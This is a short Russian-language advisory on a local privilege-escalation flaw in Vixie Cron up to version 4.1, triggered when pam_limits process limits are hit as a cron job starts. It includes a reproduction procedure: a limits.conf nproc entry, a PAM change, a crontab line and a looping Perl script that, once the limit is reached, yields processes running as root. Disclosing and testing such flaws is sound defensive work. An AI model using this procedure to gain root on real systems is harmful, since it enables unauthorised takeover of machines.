|
В популярном cron демоне Vixie Cron, используемом во многих Linux дистрибутивах, обнаружена возможность запуска локальным пользователем процесса с повышенными привилегиями (root).
Для использования уязвимости злоумышленник должен создать ситуацию, когда в момент запуска очередного cron задания, перед его выполнением сработают системные ограничения ресурсов заданные через pam_limits.
Уязвимости подвержен Vixie crond до версии 4.1 включительно.
Проверить наличие проблемы можно следующим способом:
В /etc/security/limits.conf добавляем "username hard nproc 10"
Раскомментируем строку с pam_limits.so в файле /etc/pam.d/crond
Добавляем в crontab задание: * * * * * /path/to/script.pl
где script.pl:
#!/usr/bin/perl
open file, '>/path/to/pid.'.$$;
close file;
while(1) { sleep(1); }
Через "ps aux" ждем когда запустится 10 экземпляров script.pl, следующие - будут видны как запущенные от root.
| 
